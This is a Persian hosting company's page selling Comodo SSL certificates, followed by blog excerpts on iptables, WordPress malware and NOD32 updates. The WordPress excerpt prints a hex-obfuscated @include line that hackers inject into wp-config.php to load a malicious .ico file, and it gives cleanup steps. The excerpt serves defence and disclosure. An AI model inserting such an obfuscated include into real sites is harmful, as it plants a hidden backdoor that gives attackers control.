خرید SSL

خرید SSL

با خرید SSL ارزان سایتتان را ایمن و برای گوگل قابل اعتماد کنید.SSL خواندن اطلاعاتی که بین کاربران و وب سایت ها یا بین دو سیستم منتقل می شود را غیرممکن می کند. از الگوریتم‌های رمزگذاری برای به هم زدن داده‌ها در حین انتقال استفاده می‌کند، که از خواندن آن‌ها هنگام ارسال از طریق اتصال توسط هک.رها جلوگیری می‌کند.


پروتکل HTTPS چیست و چه فرقی با HTTP دارد؟


HTTPS پروتکلی است که در بستر آن امکان رمزنگاری (encrypt) اطلاعات فراهم می شود، به لحاظ تخصصی در HTTP پورت 80 مورد استفاده قرار می گیرد، در حالی که در HTTPS این پورت 443 است؛
از طرفی همانطور که گفتیم در HTTP داده ها به صورت متن ساده یا plain text هستند اما در HTTPS رمزنگاری داده ها به وسیله SSL انجام می شود.
پروتکل امنیتی (SSL) یکی از پروتکل‌های استاندارد جهت انتقال داده‌ها بین سرویس دهنده (Server) و سرویس گیرنده (Client) به صورت رمزنگاری شده است.

پروتکل امن SSL چیست؟

SSL یک پروتکل استاندارد و رایج امنیتی برپایه رمزگذاری است که در آن داده‌های رد و بدل شده بین سرویس دهنده (Server) و سرویس گیرنده (Client) توسط کلیدهای خاصی خصوصی و عمومی رمزنگاری (Encrypt) شده و در سمت دیگر رمزگشایی (Decrypt) می‌شود. امنیت در این پروتکل دو طرفه است؛ یعنی در هر دو طرف، فرایند رمزنگاری و رمزگشایی انجام می‌گیرد.
بسیاری از سرویس دهندگانی که اطلاعات و داده‌های حساس مانند اطلاعات کارت‌های بانکی (مثلاً در شبکه بانکی کشور)، کارت‌های شناسایی، رمزهای عبور مهم و … را بین خود و سرویس گیرنده رد و بدل می‌کنند، از پروتکل‌های امنیتی مانند SSL استفاده می‌کنند. خرید SSL
وبسایت‌هایی که از با خرید SSL داده‌های سایت خود را رمزگذاری می‌کنند، معمولاً از طریق پروتکل HTTPS (به جای حالت عادی و غیر امن آن یعنی HTTP) با سرویس گیرنده‌ها ارتباط برقرار می‌کنند. در مرورگرها، اینگونه وبسایت‌ها معمولاً با علامت قفل سبز (به معنای ارتباط امن سالم) نشان داده می‌شوند.

پلن های SSL

مشخصات Positive SSL PositiveSSL Wildcard EV SSL PremiumSSL Wildcard PositiveSSL Multi-Domain EV Multi-Domain SSL
تعداد دامنه 1 domain 1domain and all subdomains 1 domain 1domain and all subdomains 3 domain (up to 100) 3 domain (up to 100)
نوع اعتبارسنجی Domain Validation Domain Validation Extended Validation Organization Validation Domain Validation Extended Validation
آدرس بار Basic HTTPS Basic HTTPS Company name in browser Company name in SSL Basic HTTPS Company name in browser
شرکت صادر کننده Comodo SSL Comodo SSL Comodo SSL Comodo SSL Comodo SSL Comodo SSL
نوع ضمانت Low assurance Low assurance Very high assurance high assurance Low assurance Very high assurance
نصب رایگان
سالیانه/تومان 703,500 4,862,860 1,969,800 4,663,200 12,381,600 10,612,800
  سفارش سفارش سفارش سفارش سفارش سفارش

پلــن مورد نظرتـــان را نیــافتید؟!

همین حالا پلن انتخابی یا کانفیگ اختصاصیتان را درخواست کنید

افزایش رتبه سئو

با خرید گواهی SSL شاهد پیشرفت سئوی سایتتان باشید.گواهی SSL، باعث می‌شه که کاربر به وبسایت شما اعتماد بیشتری کند و در طول زمان، این موضوع افزایش ترافیک سایت را به همراه دارد.

اعتماد سازی کاربر

با خرید SSL سایتتان را برای بازدیدکنندگان و کاربران امن کنید. در نتیجه باعث اعتماد سازی کاربران در برابر تبادل اطلاعاتشان با سایتتان باشید.

نصب رایگان

نصب به صورت رایگان در هاست شما توسط بخش پشتیبانی وان سرور صورت میگیرد.

تمدید آسان

بدون هیچ مشکلی گواهینامه ssl سایتتان را تمدید کنید. بدون نیاز به Renew در دوره 90 روزه! الریخ انقضای ssl شما 360 روزه میباشد.

جلوگیری از Sniff

با خرید SSL، امنیت مشخصات کاربرانتان در برابر شنود، شبکه ای امن نگه دارید.

ساب دامنه نامحدود

با خرید برخی پلن های SSL ، دامنه و تمام ساب دامنه هایتان را ssl کنید.

سوالات متداول

برخی از سوالاتی که ممکن است در ابتدا داشته باشید

اگر وب سایت شما اطلاعات مالی کاربران همانند شماره عابر بانک و غیره را دریافت می کند شما می بایست الزاما از گواهی SSL استفاده کنید. اگر در وب سایت خود اطلاعات ورود به وب سایت مثل رمز عبور دریافت می کنید و یا اینکه از کاربران وب سایت خود هنگام ثبت اطلاعات شخصی همانند آدرس، شماره تلفن و اطلاعات مالی را سوال می کنید، نیاز به خرید SSL دارید.

SSL مخفف عبارت Socket Secure Layer يک تکنولوژي استاندارد و به ثبت رسيده براي تأمين ارتباطي امن بين يک وب سرور و يک مرورگر اينترنت می باشد. اين ارتباط امن از تمامي اطلاعاتي که ما بين وب سرور و مرورگر اينترنت (کاربر) انتقال می يابد، محافظت مي کند تا اين داده ها به صورت محرمانه و دست نخورده باقي بماند. گواهینامه SSL يک استاندارد فنی است و توسط میليونها وب سايت در سراسر جهان براي برقراري امنيت انتقال اطلاعات استفاده مي شود. براي اينکه يک وب سايت بتواند ارتباطي امن داشته باشد نياز به خرید يک گواهينامه SSL دارد . شما معمولا سایت هایی را که دارای گواهی SSL هستند را می توانید از طریق وجود https به جای http در ابتدای آدرس آنها تشخیص دهید.

اگر وب سایت شما اطلاعات مالی کاربران همانند شماره عابر بانک و غیره را دریافت می کند شما می بایست الزاما از SSL استفاده کنید. اگر در وب سایت خود اطلاعات ورود به وب سایت مثل رمز عبور دریافت می کنید و یا اینکه از کاربران وب سایت خود هنگام ثبت اطلاعات شخصی همانند آدرس، شماره تلفن و اطلاعات مالی را سوال می کنید، نیاز به خرید SSL دارید.

بله از آنجاییکه گواهی های SSL بر اساس دامنه ی میزبانی شده در وب سرورها اعتبار سنجی می شوند، برای تهیه گواهی SSL حتما می بایست از یک دامنه ی معتبر استفاده نمایید و به همین دلیل امکان استفاده از IP برای تهیه گواهی SSL وجود ندارد.

میتوانید از لینک زیر دامنه مورئ نظرتان را خریداری کنید:

https://one3erver.com/domains

در صورت خرید SSL تنها از نوع wildcard قادر خواهید بود علاوه بر دامنه ، جهت ساب دامین های سرویس میزبانی خود نیز از این گواهی SSL استفاده نمایید و تمامی اطلاعات صفحات وب سایت شما *.yourdomain.com به صورت encrypt شده با کاربران تبادل اطلاعات انجام دهند

گواهینامه EV که گواهینامه نوار سبز نیز نام برده میشود، معتبر ترین نوع گواهی نامه SSL بوده که علاوه برامن نمودن ارتباط سایت و بازدیدکنندگان، از phishing اطلاعات محرمانه کاربران و ریدایرکت شدن به صفحات جعلی جلوگیری می کند. با داشتن این گواهی نامه در کنار آدرس سایت، نام شرکت مالک سایت نیزنمایش داده می شود و نوار آدرس نیز به نشانه تایید مشخصات سایت و مالک آن به رنگ سبز درمی آید و بدین صورت از هرگونه دزدیده شدن اطلاعات کاربران جلوگیری میشود.

در صورتی که بر روی هاست های وان سرور میزبانی می شوید پس از خرید اس اس ال تیم فنی وان سرور این گواهی را بر روی هاست یا سرور شما نصب خواهند کرد و تمامی تغییرات دیگر را برای اجرایی شدن بدون مشکل سایتتان انجام خواهند داد. در غیر این صورت باید کد CSR را از سمت هاست فعلیتان برای ما ارسال نمایید.

اگر جواب سوالتان را نیافتید، میتوانید از لینک زیر در بخش تماس با ما از طریق پلهای ارتباطی با ما در ارتباط باشید.

صفحه تماس بـــا مـــا

نظرات مشتریان

برخی از نظرات مشتریان وان سرور

جزیره آموزشی

برخی از پستهای آموزشی پیشنهادی
باز کردن پورت در Centos

باز کردن پورت در Centos

باز کردن پورت در Centosتوجه: این روش بیشتر برای centos های 5 و 6 جوابگو است. برای مشاهدهآموزش مدیریت Rule ها و پورت های فایروال در CentOs7 کلیک کنیدبرای بازکردن پورت در CentOS از روش زیر استفاده میکنیم:وارد محیط SSH شویدفایل iptables را با دستور زیر باز می کنیم :nano /etc/sysconfig/iptablesسپس خط زیر را به این فایل اضافه کرده و آن را دخیره می کنیم :-A INPUT -p tcp -m tcp --dport Port -j ACCEPTبجای کلمه Port ، پورت مورد نظر را قرار دهید.به طور مثال:-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT-A INPUT -p tcp -m tcp --dport 2222 -j ACCEPT-A INPUT -p tcp -m tcp --dport 25 -j ACCEPTو سپس iptables را ذخیره و ریستارت می کنیمservice iptables saveservice iptables restartبرای خرید سرور مجازی لینوکس کلیک کنید

دوشنبه, 25 بهمن 1395

ادامه مطلب
هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسیهشدار 100 درصد خطرناک برای دارندگان سایت وردپرسیقبلا چندین بار هشدار دادیم و کسی توجه نکردمتاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهندعزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنیدهکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .- چند مدیریت برای خویش فعال می کنند- با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .favicon_3a0642.icofavicon_993c6a.icoحالا با آن دسترسی ها همه جا را ویرایش و خراب می کننددر فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنن:@include "\x2fh\x6fm\x65/\x6ea\x67h\x61s\x68y\x2fp\x75b\x6ci\x63_\x68t\x6dl \x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x399\x33c\x36a\x2ei\x63o";که دیکد آن چنین می شود:@include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند .....حال چطور این طور سایت ها را رفع مشکل کنیم1- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم2- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم3- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم4- سطح فایل کانفیگ را 444 قرار می دهیم5- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم6- بر روی پوشه مدیریت پسورد می گذاریم7- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.برگرفته شده از انجمن وردپرس ایرانی

سه‌شنبه, 21 آذر 1396

ادامه مطلب
آموزش استفاده از سرور آپدیت آنتی ویروس نود 32 در نگارش های 3 و 4

آموزش استفاده از سرور آپدیت آنتی ویروس نود 32 در نگارش های 3 و 4

برای استفاده از اکانت خریداری شده در نگارش 3 و 4 آنتی ویروس مراحل زیر را انجام دهید:پنجره ی اصلی آنتی ویروس نود 32 را باز کرده و کلید F5 را روی کیبورد فشار دهید تا به بخش تنظیمات settings آنتی ویروس بروید.برای اجرا کردن آنتی ویروس نود 32 برروی آیکن آن کنار ساعت ویندوز Notification Area دوبار کلیک کنید:در بنجره ی تنظیمات نود32 همانند تصاویر زیر به بخش Update نراجعه کنید و با کلیک بر روی دکمه Edit سرور آپدیت را به آنتی ویروس اضافه Add نمایید. سپس یوزرنیم و پسورد خریداری شده در انتی ویروس وارد کنید:آدرس سرور: http://X.X.X.X/v8همانطور که در تصویر زیر مشخص شده آدرس سرور آپدیت به آنتی ویروس اضافه شده است.در بخش Username ، نام کاربری مخصوص خود را وارد کنید.در بخش Password، پسورد مخصوص به خود را وارد کنید.توجه* یوزرنیم و پسوردی که وارد میکنید همان مشخصاتی است که از طریق IBSng ساخته اید.در نهایت بر روی OK کلیک کنید.حال در پنجره اولیه آنتی ویروس به بخش Update رفته و برروی Update Virus signature database کلیک کنید تا آپدیت آنتی ویروس آغاز شود.*توجه*اگر پس از کلیک بر روی دکمه ی Update با پیام زیر مواجه شدید به این معناست که یوزرنیم و پسورد وارد شده اشتباه است و یا اینکه لایسنس سرور شما منقضی شدهبرای اطلاع از زمان انقضاء اکانت کاتربران از لینک زیر اقدام کنید:  http://X.X.X.X/IBSng/userبرای دریافت لایسنسهای تریال آپدیت نود 32 شونایس به لینک زیر مراجعه کنید: http://iran-nod32.tinysite.ir/برای دسترسی و نحوه وارد کردن لایسنس و دستورات آپدیت دستی پس از دریافت از وان سرور مشخصات و دستورات مورد نیاز متناسب با سرور شما، برایتان ارسال شدهدر صورت نیاز به سرور از بخش تیکت پشتیبانی و بخش تماس با ما در ارتیاط باشید

یکشنبه, 10 آبان 1394

ادامه مطلب